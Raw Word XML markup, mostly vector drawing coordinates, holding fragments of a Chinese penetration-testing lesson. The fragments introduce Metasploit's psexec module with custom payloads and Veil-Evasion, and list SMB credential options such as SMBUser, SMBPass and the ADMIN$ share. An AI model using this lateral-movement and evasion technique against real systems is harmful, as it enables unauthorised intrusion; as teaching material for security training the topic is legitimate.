61,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10169,4961,10168,4961,10168,4961,10168,4961,10168,4961,10168,4961,10168,4961,10167,4961,10167,4961,10167,4961,10166,4961,10166,4961,10166,4961,10165,4961,10165,4961,10165,4961,10164,4961,10164,4961,10163,4961,10163,4961,10162,4961,10161,4961,10161,4961,10160,4961,10159,4961,10159,4961,10158,4961,10157,4961,10156,4961,10155,4961,10154,4961,10153,4961,10152,4961,10151,4961,10150,4961,10149,4961,10148,4961,10147,4961,10145,4961,10144,4961,10143,4961,10141,4961,10140,4961,10138,4961,10136,4961,10135,4961,10133,4961,10131,4961,10129,4961,10128,4961,10126,4961,10124,4961,10122,4961,10119,4961,10117,4961,10115,4961,10113,4961,10110,4961,10108,4961,10105,4961,10103,4961,10100,4961,10097,4961,10094,4961,10092,4961,10089,4961,10086,4961,10083,4961,10079,4961,10076,4961,10073,4961,10069,4961,10066,4961,10062,4961,10059,4961,10055,4961,10051,4961,10047,4961,10043,4961,10039,4961,10035,4961,10031,4961,10027,4961,10022,4961,10018,4961,10013,4961,10008,4961,10004,4961,9999,4961,9994,4961,9989,4961,9984,4961,9978,4961,9973,4961,9968,4961,9962,4961,9956,4961,9951,4961,9945,4961,9939,4961,9933,4961,9927,4961,9920,4961,9914e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:602.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,12050" coordsize="130,250">
        <v:shape style="position:absolute;left:4930;top:12050;width:130;height:250" coordorigin="4930,12050" coordsize="130,250" path="m4946,12060l4946,12060,4946,12060,4946,12060,4946,12060,4946,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4947,12060,4948,12060,4948,12060,4948,12060,4948,12060,4948,12060,4948,12060,4949,12060,4949,12060,4949,12060,4949,12060,4950,12060,4950,12060,4950,12060,4950,12060,4951,12060,4951,12060,4951,12060,4952,12060,4952,12060,4953,12060,4953,12060,4953,12060,4954,12060,4954,12060,4955,12060,4955,12060,4956,12060,4957,12060,4957,12060,4958,12060,4958,12060,4959,12060,4960,12060,4960,12060,4961,12060,4962,12060,4963,12060,4963,12060,4964,12060,4965,12060,4966,12060,4967,12060,4968,12060,4969,12060,4970,12060,4971,12060,4972,12060,4973,12060,4974,12060,4975,12060,4977,12060,4978,12060,4979,12060,4980,12060,4982,12060,4983,12060,4984,12060,4986,12060,4987,12060,4989,12060,4990,12060,4992,12060,4993,12060,4995,12060,4997,12060,4998,12060,5000,12060,5002,12060,5004,12060,5006,12060,5008,12060,5010,12060,5012,12060,5014,12060,5016,12060,5018,12060,5020,12060,5022,12060,5024,12060,5027,12060,5029,12060,5031,12060,5034,12060,5036,12060,5039,12060,5041,12060,5044,12060,5047,12060,5049,12060,5052,12060,5055,12060,5058,12060,5061,12060,5064,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12060,5067,12061,5067,12061,5067,12061,5067,12061,5067,12061,5067,12061,5067,12061,5067,12062,5067,12062,5067,12062,5067,12062,5067,12063,5067,12063,5067,12063,5067,12064,5067,12064,5067,12065,5067,12065,5067,12066,5067,12066,5067,12067,5067,12067,5067,12068,5067,12068,5067,12069,5067,12070,5067,12071,5067,12071,5067,12072,5067,12073,5067,12074,5067,12075,5067,12076,5067,12077,5067,12078,5067,12079,5067,12080,5067,12081,5067,12083,5067,12084,5067,12085,5067,12087,5067,12088,5067,12090,5067,12091,5067,12093,5067,12094,5067,12096,5067,12098,5067,12100,5067,12102,5067,12104,5067,12106,5067,12108,5067,12110,5067,12112,5067,12114,5067,12117,5067,12119,5067,12121,5067,12124,5067,12127,5067,12129,5067,12132,5067,12135,5067,12138,5067,12141,5067,12144,5067,12147,5067,12150,5067,12153,5067,12156,5067,12160,5067,12163,5067,12167,5067,12170,5067,12174,5067,12178,5067,12182,5067,12186,5067,12190,5067,12194,5067,12198,5067,12203,5067,12207,5067,12211,5067,12216,5067,12221,5067,12226,5067,12230,5067,12235,5067,12240,5067,12246,5067,12251,5067,12256,5067,12262,5067,12267,5067,12273,5067,12279,5067,12284,5067,12290,5067,12296,5067,12303,5067,12309,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5067,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5066,12315,5065,12315,5065,12315,5065,12315,5065,12315,5065,12315,5065,12315,5064,12315,5064,12315,5064,12315,5064,12315,5063,12315,5063,12315,5063,12315,5063,12315,5062,12315,5062,12315,5062,12315,5061,12315,5061,12315,5060,12315,5060,12315,5060,12315,5059,12315,5059,12315,5058,12315,5058,12315,5057,12315,5057,12315,5056,12315,5055,12315,5055,12315,5054,12315,5053,12315,5053,12315,5052,12315,5051,12315,5050,12315,5050,12315,5049,12315,5048,12315,5047,12315,5046,12315,5045,12315,5044,12315,5043,12315,5042,12315,5041,12315,5040,12315,5039,12315,5038,12315,5036,12315,5035,12315,5034,12315,5033,12315,5031,12315,5030,12315,5029,12315,5027,12315,5026,12315,5024,12315,5023,12315,5021,12315,5020,12315,5018,12315,5016,12315,5015,12315,5013,12315,5011,12315,5009,12315,5007,12315,5005,12315,5004,12315,5002,12315,4999,12315,4997,12315,4995,12315,4993,12315,4991,12315,4989,12315,4986,12315,4984,12315,4982,12315,4979,12315,4977,12315,4974,12315,4972,12315,4969,12315,4966,12315,4964,12315,4961,12315,4958,12315,4955,12315,4952,12315,4949,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12315,4946,12314,4946,12314,4946,12314,4946,12314,4946,12314,4946,12314,4946,12313,4946,12313,4946,12313,4946,12313,4946,12312,4946,12312,4946,12312,4946,12311,4946,12311,4946,12310,4946,12310,4946,12309,4946,12309,4946,12308,4946,12308,4946,12307,4946,12306,4946,12306,4946,12305,4946,12304,4946,12303,4946,12302,4946,12301,4946,12300,4946,12299,4946,12298,4946,12297,4946,12296,4946,12295,4946,12294,4946,12293,4946,12291,4946,12290,4946,12289,4946,12287,4946,12286,4946,12284,4946,12283,4946,12281,4946,12279,4946,12277,4946,12276,4946,12274,4946,12272,4946,12270,4946,12268,4946,12265,4946,12263,4946,12261,4946,12259,4946,12256,4946,12254,4946,12251,4946,12249,4946,12246,4946,12243,4946,12241,4946,12238,4946,12235,4946,12232,4946,12229,4946,12225,4946,12222,4946,12219,4946,12216,4946,12212,4946,12208,4946,12205,4946,12201,4946,12197,4946,12193,4946,12189,4946,12185,4946,12181,4946,12177,4946,12173,4946,12168,4946,12164,4946,12159,4946,12155,4946,12150,4946,12145,4946,12140,4946,12135,4946,12130,4946,12124,4946,12119,4946,12114,4946,12108,4946,12103,4946,12097,4946,12091,4946,12085,4946,12079,4946,12073,4946,12066,4946,12060e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:318.500pt;margin-top:602.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6370,12050" coordsize="130,250">
        <v:shape style="position:absolute;left:6370;top:12050;width:130;height:250" coordorigin="6370,12050" coordsize="130,250" path="m6387,12060l6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6387,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6388,12060,6389,12060,6389,12060,6389,12060,6389,12060,6389,12060,6390,12060,6390,12060,6390,12060,6390,12060,6391,12060,6391,12060,6391,12060,6391,12060,6392,12060,6392,12060,6392,12060,6393,12060,6393,12060,6394,12060,6394,12060,6395,12060,6395,12060,6396,12060,6396,12060,6397,12060,6397,12060,6398,12060,6398,12060,6399,12060,6400,12060,6400,12060,6401,12060,6402,12060,6403,12060,6403,12060,6404,12060,6405,12060,6406,12060,6407,12060,6408,12060,6409,12060,6410,12060,6411,12060,6412,12060,6413,12060,6414,12060,6415,12060,6416,12060,6417,12060,6418,12060,6420,12060,6421,12060,6422,12060,6424,12060,6425,12060,6427,12060,6428,12060,6429,12060,6431,12060,6433,12060,6434,12060,6436,12060,6437,12060,6439,12060,6441,12060,6443,12060,6445,12060,6446,12060,6448,12060,6450,12060,6452,12060,6454,12060,6456,12060,6458,12060,6461,12060,6463,12060,6465,12060,6467,12060,6470,12060,6472,12060,6474,12060,6477,12060,6479,12060,6482,12060,6485,12060,6487,12060,6490,12060,6493,12060,6496,12060,6498,12060,6501,12060,6504,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12060,6507,12061,6507,12061,6507,12061,6507,12061,6507,12061,6507,12061,6507,12061,6507,12062,6507,12062,6507,12062,6507,12062,6507,12063,6507,12063,6507,12063,6507,12064,6507,12064,6507,12065,6507,12065,6507,12066,6507,12066,6507,12067,6507,12067,6507,12068,6507,12068,6507,12069,6507,12070,6507,12071,6507,12071,6507,12072,6507,12073,6507,12074,6507,12075,6507,12076,6507,12077,6507,12078,6507,12079,6507,12080,6507,12081,6507,12083,6507,12084,6507,12085,6507,12087,6507,12088,6507,12090,6507,12091,6507,12093,6507,12094,6507,12096,6507,12098,6507,12100,6507,12102,6507,12104,6507,12106,6507,12108,6507,12110,6507,12112,6507,12114,6507,12117,6507,12119,6507,12121,6507,12124,6507,12127,6507,12129,6507,12132,6507,12135,6507,12138,6507,12141,6507,12144,6507,12147,6507,12150,6507,12153,6507,12156,6507,12160,6507,12163,6507,12167,6507,12170,6507,12174,6507,12178,6507,12182,6507,12186,6507,12190,6507,12194,6507,12198,6507,12203,6507,12207,6507,12211,6507,12216,6507,12221,6507,12226,6507,12230,6507,12235,6507,12240,6507,12246,6507,12251,6507,12256,6507,12262,6507,12267,6507,12273,6507,12279,6507,12284,6507,12290,6507,12296,6507,12303,6507,12309,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6507,12315,6506,12315,6506,12315,6506,12315,6506,12315,6506,12315,6506,12315,6506,12315,6505,12315,6505,12315,6505,12315,6505,12315,6504,12315,6504,12315,6504,12315,6504,12315,6503,12315,6503,12315,6503,12315,6502,12315,6502,12315,6502,12315,6501,12315,6501,12315,6500,12315,6500,12315,6499,12315,6499,12315,6498,12315,6498,12315,6497,12315,6497,12315,6496,12315,6495,12315,6495,12315,6494,12315,6493,12315,6493,12315,6492,12315,6491,12315,6490,12315,6489,12315,6489,12315,6488,12315,6487,12315,6486,12315,6485,12315,6484,12315,6483,12315,6482,12315,6481,12315,6480,12315,6478,12315,6477,12315,6476,12315,6475,12315,6473,12315,6472,12315,6471,12315,6469,12315,6468,12315,6467,12315,6465,12315,6464,12315,6462,12315,6460,12315,6459,12315,6457,12315,6455,12315,6454,12315,6452,12315,6450,12315,6448,12315,6446,12315,6444,12315,6442,12315,6440,12315,6438,12315,6436,12315,6434,12315,6432,12315,6429,12315,6427,12315,6425,12315,6422,12315,6420,12315,6418,12315,6415,12315,6412,12315,6410,12315,6407,12315,6404,12315,6402,12315,6399,12315,6396,12315,6393,12315,6390,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12315,6387,12314,6387,12314,6387,12314,6387,12314,6387,12314,6387,12314,6387,12313,6387,12313,6387,12313,6387,12313,6387,12312,6387,12312,6387,12312,6387,12311,6387,12311,6387,12310,6387,12310,6387,12309,6387,12309,6387,12308,6387,12308,6387,12307,6387,12306,6387,12306,6387,12305,6387,12304,6387,12303,6387,12302,6387,12301,6387,12300,6387,12299,6387,12298,6387,12297,6387,12296,6387,12295,6387,12294,6387,12293,6387,12291,6387,12290,6387,12289,6387,12287,6387,12286,6387,12284,6387,12283,6387,12281,6387,12279,6387,12277,6387,12276,6387,12274,6387,12272,6387,12270,6387,12268,6387,12265,6387,12263,6387,12261,6387,12259,6387,12256,6387,12254,6387,12251,6387,12249,6387,12246,6387,12243,6387,12241,6387,12238,6387,12235,6387,12232,6387,12229,6387,12225,6387,12222,6387,12219,6387,12216,6387,12212,6387,12208,6387,12205,6387,12201,6387,12197,6387,12193,6387,12189,6387,12185,6387,12181,6387,12177,6387,12173,6387,12168,6387,12164,6387,12159,6387,12155,6387,12150,6387,12145,6387,12140,6387,12135,6387,12130,6387,12124,6387,12119,6387,12114,6387,12108,6387,12103,6387,12097,6387,12091,6387,12085,6387,12079,6387,12073,6387,12066,6387,12060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53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MSF的exploit模块下是支持set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-22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payload的，同样在复杂的网络环境下，许多模块也同样支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持自定义的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload。可以更好的配合第三方框架，如第十一课中提到的Veil-Evasion等。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以exploit/windows/smb/psexec为d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emo。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攻</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>击机配置如下：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43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psexec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455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psexec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SERVICE_DESCRIPTION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pretty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listing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SERVICE_DISPLAY_NAME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="3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display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SERVICE_NAME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SHARE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ADMIN$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share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connect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can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admin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share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ADMI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N$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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C$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normal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read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z w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>write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folder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share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SMBDomain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authentication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SMBPass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specified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290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SMBUser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authenticate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374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.5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626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25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158.54pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,3161">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:3161" coordorigin="10402,0" coordsize="0,3161" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,6,10402,7,10402,9,10402,10,10402,12,10402,15,10402,17,10402,19,10402,22,10402,25,10402,29,10402,32,10402,36,10402,41,10402,45,10402,50,10402,55,10402,61,10402,67,10402,73,10402,80,10402,87,10402,95,10402,102,10402,111,10402,120,10402,129,10402,138,10402,149,10402,159,10402,170,10402,182,10402,194,10402,207,10402,220,10402,234,10402,248,10402,263,10402,279,10402,295,10402,312,10402,329,10402,347,10402,366,10402,385,10402,405,10402,425,10402,447,10402,469,10402,491,10402,515,10402,539,10402,564,10402,589,10402,616,10402,643,10402,671,10402,700,10402,729,10402,760,10402,791,10402,823,10402,856,10402,890,10402,924,10402,960,10402,996,10402,1034,10402,1072,10402,1111,10402,1152,10402,1193,10402,1235,10402,1278,10402,1322,10402,1367,10402,1413,10402,1460,10402,1508,10402,1558,10402,1608,10402,1659,10402,1712,10402,1765,10402,1820,10402,1875,10402,1932,10402,1990,10402,2049,10402,2110,10402,2171,10402,2234,10402,2297,10402,2363,10402,2429,10402,2496,10402,2565,10402,2635,10402,2706,10402,2779,10402,2852,10402,2927,10402,3004,10402,3082,10402,3161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7.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1350" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1350;width:8990;height:350" coordorigin="1490,1350" coordsize="8990,35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5,10484,1376,10484,1376,10484,1376,10484,1376,10484,1377,10484,1377,10484,1377,10484,1377,10484,1378,10484,1378,10484,1379,10484,1379,10484,1379,10484,1380,10484,1381,10484,1381,10484,1382,10484,1382,10484,1383,10484,1384,10484,1385,10484,1385,10484,1386,10484,1387,10484,1388,10484,1389,10484,1390,10484,1391,10484,1393,10484,1394,10484,1395,10484,1396,10484,1398,10484,1399,10484,1401,10484,1402,10484,1404,10484,1406,10484,1407,10484,1409,10484,1411,10484,1413,10484,1415,10484,1417,10484,1419,10484,1421,10484,1424,10484,1426,10484,1428,10484,1431,10484,1434,10484,1436,10484,1439,10484,1442,10484,1445,10484,1448,10484,1451,10484,1454,10484,1457,10484,1461,10484,1464,10484,1468,10484,1471,10484,1475,10484,1479,10484,1483,10484,1487,10484,1491,10484,1495,10484,1499,10484,1504,10484,1508,10484,1513,10484,1518,10484,1522,10484,1527,10484,1532,10484,1537,10484,1543,10484,1548,10484,1554,10484,1559,10484,1565,10484,1571,10484,1577,10484,1583,10484,1589,10484,1595,10484,1601,10484,1608,10484,1615,10484,1622,10484,1628,10484,1635,10484,1643,10484,1650,10484,1657,10484,1665,10484,1673,10484,1681,10484,1688,10484,1697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5,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1704,1510,1703,1510,1703,1510,1703,1510,1702,1510,1702,1510,1702,1510,1701,1510,1701,1510,1701,1510,1700,1510,1700,1510,1699,1510,1698,1510,1698,1510,1697,1510,1696,1510,1696,1510,1695,1510,1694,1510,1693,1510,1692,1510,1691,1510,1690,1510,1689,1510,1688,1510,1687,1510,1686,1510,1685,1510,1683,1510,1682,1510,1680,1510,1679,1510,1677,1510,1676,1510,1674,1510,1672,1510,1670,1510,1669,1510,1667,1510,1665,1510,1663,1510,1660,1510,1658,1510,1656,1510,1653,1510,1651,1510,1649,1510,1646,1510,1643,1510,1640,1510,1638,1510,1635,1510,1632,1510,1629,1510,1625,1510,1622,1510,1619,1510,1615,1510,1612,1510,1608,1510,1605,1510,1601,1510,1597,1510,1593,1510,1589,1510,1585,1510,1580,1510,1576,1510,1571,1510,1567,1510,1562,1510,1557,1510,1552,1510,1547,1510,1542,1510,1537,1510,1532,1510,1526,1510,1520,1510,1515,1510,1509,1510,1503,1510,1497,1510,1491,1510,1484,1510,1478,1510,1472,1510,1465,1510,1458,1510,1451,1510,1444,1510,1437,1510,1430,1510,1422,1510,1415,1510,1407,1510,1399,1510,1391,1510,1383,1510,1375e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:1370;width:30;height:330" coordorigin="1490,1370" coordsize="30,330" path="m1517,1375l1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1375,1517,1376,1517,1376,1517,1376,1517,1376,1517,1377,1517,1377,1517,1377,1517,1377,1517,1378,1517,1378,1517,1379,1517,1379,1517,1379,1517,1380,1517,1381,1517,1381,1517,1382,1517,1382,1517,1383,1517,1384,1517,1385,1517,1385,1517,1386,1517,1387,1517,1388,1517,1389,1517,1390,1517,1391,1517,1393,1517,1394,1517,1395,1517,1396,1517,1398,1517,1399,1517,1401,1517,1402,1517,1404,1517,1406,1517,1407,1517,1409,1517,1411,1517,1413,1517,1415,1517,1417,1517,1419,1517,1421,1517,1424,1517,1426,1517,1428,1517,1431,1517,1434,1517,1436,1517,1439,1517,1442,1517,1445,1517,1448,1517,1451,1517,1454,1517,1457,1517,1461,1517,1464,1517,1468,1517,1471,1517,1475,1517,1479,1517,1483,1517,1487,1517,1491,1517,1495,1517,1499,1517,1504,1517,1508,1517,1513,1517,1518,1517,1522,1517,1527,1517,1532,1517,1537,1517,1543,1517,1548,1517,1554,1517,1559,1517,1565,1517,1571,1517,1577,1517,1583,1517,1589,1517,1595,1517,1601,1517,1608,1517,1615,1517,1622,1517,1628,1517,1635,1517,1643,1517,1650,1517,1657,1517,1665,1517,1673,1517,1681,1517,1688,1517,1697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9.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1690" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1690;width:8990;height:390" coordorigin="1490,1690" coordsize="8990,39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7,10484,1707,10484,1707,10484,1708,10484,1708,10484,1708,10484,1709,10484,1709,10484,1710,10484,1710,10484,1711,10484,1711,10484,1712,10484,1713,10484,1714,10484,1714,10484,1715,10484,1716,10484,1717,10484,1718,10484,1719,10484,1720,10484,1721,10484,1723,10484,1724,10484,1725,10484,1727,10484,1728,10484,1729,10484,1731,10484,1733,10484,1734,10484,1736,10484,1738,10484,1740,10484,1742,10484,1744,10484,1746,10484,1748,10484,1751,10484,1753,10484,1755,10484,1758,10484,1761,10484,1763,10484,1766,10484,1769,10484,1772,10484,1775,10484,1778,10484,1781,10484,1785,10484,1788,10484,1791,10484,1795,10484,1799,10484,1803,10484,1807,10484,1811,10484,1815,10484,1819,10484,1823,10484,1828,10484,1832,10484,1837,10484,1842,10484,1846,10484,1851,10484,1857,10484,1862,10484,1867,10484,1873,10484,1878,10484,1884,10484,1890,10484,1896,10484,1902,10484,1908,10484,1914,10484,1921,10484,1927,10484,1934,10484,1941,10484,1948,10484,1955,10484,1963,10484,1970,10484,1978,10484,1985,10484,1993,10484,2001,10484,2009,10484,2018,10484,2026,10484,2035,10484,2043,10484,2052,10484,2061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7,1510,2077,1510,2077,1510,2076,1510,2076,1510,2075,1510,2075,1510,2074,1510,2073,1510,2073,1510,2072,1510,2071,1510,2070,1510,2070,1510,2069,1510,2068,1510,2067,1510,2066,1510,2065,1510,2064,1510,2062,1510,2061,1510,2060,1510,2058,1510,2057,1510,2055,1510,2054,1510,2052,1510,2051,1510,2049,1510,2047,1510,2045,1510,2043,1510,2041,1510,2039,1510,2037,1510,2034,1510,2032,1510,2030,1510,2027,1510,2024,1510,2022,1510,2019,1510,2016,1510,2013,1510,2010,1510,2007,1510,2004,1510,2000,1510,1997,1510,1993,1510,1990,1510,1986,1510,1982,1510,1978,1510,1974,1510,1970,1510,1966,1510,1962,1510,1957,1510,1953,1510,1948,1510,1943,1510,1938,1510,1933,1510,1928,1510,1923,1510,1918,1510,1912,1510,1907,1510,1901,1510,1895,1510,1889,1510,1883,1510,1877,1510,1870,1510,1864,1510,1857,1510,1851,1510,1844,1510,1837,1510,1830,1510,1822,1510,1815,1510,1807,1510,1800,1510,1792,1510,1784,1510,1776,1510,1767,1510,1759,1510,1750,1510,1741,1510,1733,1510,1723,1510,1714,1510,1705e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:84.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1690" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:1690;width:30;height:390" coordorigin="1490,1690" coordsize="30,390" path="m1517,1705l1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1705,1517,1706,1517,1706,1517,1706,1517,1706,1517,1706,1517,1707,1517,1707,1517,1707,1517,1708,1517,1708,1517,1708,1517,1709,1517,1709,1517,1710,1517,1710,1517,1711,1517,1711,1517,1712,1517,1713,1517,1714,1517,1714,1517,1715,1517,1716,1517,1717,1517,1718,1517,1719,1517,1720,1517,1721,1517,1723,1517,1724,1517,1725,1517,1727,1517,1728,1517,1729,1517,1731,1517,1733,1517,1734,1517,1736,1517,1738,1517,1740,1517,1742,1517,1744,1517,1746,1517,1748,1517,1751,1517,1753,1517,1755,1517,1758,1517,1761,1517,1763,1517,1766,1517,1769,1517,1772,1517,1775,1517,1778,1517,1781,1517,1785,1517,1788,1517,1791,1517,1795,1517,1799,1517,1803,1517,1807,1517,1811,1517,1815,1517,1819,1517,1823,1517,1828,1517,1832,1517,1837,1517,1842,1517,1846,1517,1851,1517,1857,1517,1862,1517,1867,1517,1873,1517,1878,1517,1884,1517,1890,1517,1896,1517,1902,1517,1908,1517,1914,1517,1921,1517,1927,1517,1934,1517,1941,1517,1948,1517,1955,1517,1963,1517,1970,1517,1978,1517,1985,1517,1993,1517,2001,1517,2009,1517,2018,1517,2026,1517,2035,1517,2043,1517,2052,1517,2061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8.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:2070;width:8990;height:370" coordorigin="1490,2070" coordsize="8990,3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100,10484,2101,10484,2102,10484,2104,10484,2105,10484,2107,10484,2108,10484,2110,10484,2112,10484,2114,10484,2116,10484,2118,10484,2120,10484,2122,10484,2124,10484,2126,10484,2129,10484,2131,10484,2133,10484,2136,10484,2139,10484,2141,10484,2144,10484,2147,10484,2150,10484,2153,10484,2157,10484,2160,10484,2163,10484,2167,10484,2170,10484,2174,10484,2178,10484,2181,10484,2185,10484,2189,10484,2194,10484,2198,10484,2202,10484,2207,10484,2211,10484,2216,10484,2221,10484,2226,10484,2231,10484,2236,10484,2241,10484,2246,10484,2252,10484,2258,10484,2263,10484,2269,10484,2275,10484,2281,10484,2287,10484,2294,10484,2300,10484,2307,10484,2314,10484,2320,10484,2327,10484,2335,10484,2342,10484,2349,10484,2357,10484,2365,10484,2372,10484,2380,10484,2388,10484,2397,10484,2405,10484,2414,10484,2422,10484,2431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40,1510,2440,1510,2440,1510,2439,1510,2439,1510,2439,1510,2439,1510,2439,1510,2438,1510,2438,1510,2438,1510,2437,1510,2437,1510,2436,1510,2436,1510,2436,1510,2435,1510,2434,1510,2434,1510,2433,1510,2433,1510,2432,1510,2431,1510,2430,1510,2429,1510,2428,1510,2428,1510,2427,1510,2425,1510,2424,1510,2423,1510,2422,1510,2421,1510,2419,1510,2418,1510,2417,1510,2415,1510,2414,1510,2412,1510,2410,1510,2408,1510,2407,1510,2405,1510,2403,1510,2401,1510,2399,1510,2396,1510,2394,1510,2392,1510,2389,1510,2387,1510,2384,1510,2382,1510,2379,1510,2376,1510,2373,1510,2370,1510,2367,1510,2364,1510,2360,1510,2357,1510,2354,1510,2350,1510,2346,1510,2343,1510,2339,1510,2335,1510,2331,1510,2327,1510,2322,1510,2318,1510,2314,1510,2309,1510,2304,1510,2299,1510,2295,1510,2290,1510,2284,1510,2279,1510,2274,1510,2268,1510,2263,1510,2257,1510,2251,1510,2245,1510,2239,1510,2233,1510,2226,1510,2220,1510,2213,1510,2207,1510,2200,1510,2193,1510,2186,1510,2178,1510,2171,1510,2163,1510,2156,1510,2148,1510,2140,1510,2132,1510,2124,1510,2115,1510,2107,1510,2098,1510,2089,1510,2080e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:103.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,2070" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:2070;width:30;height:370" coordorigin="1490,2070" coordsize="30,370" 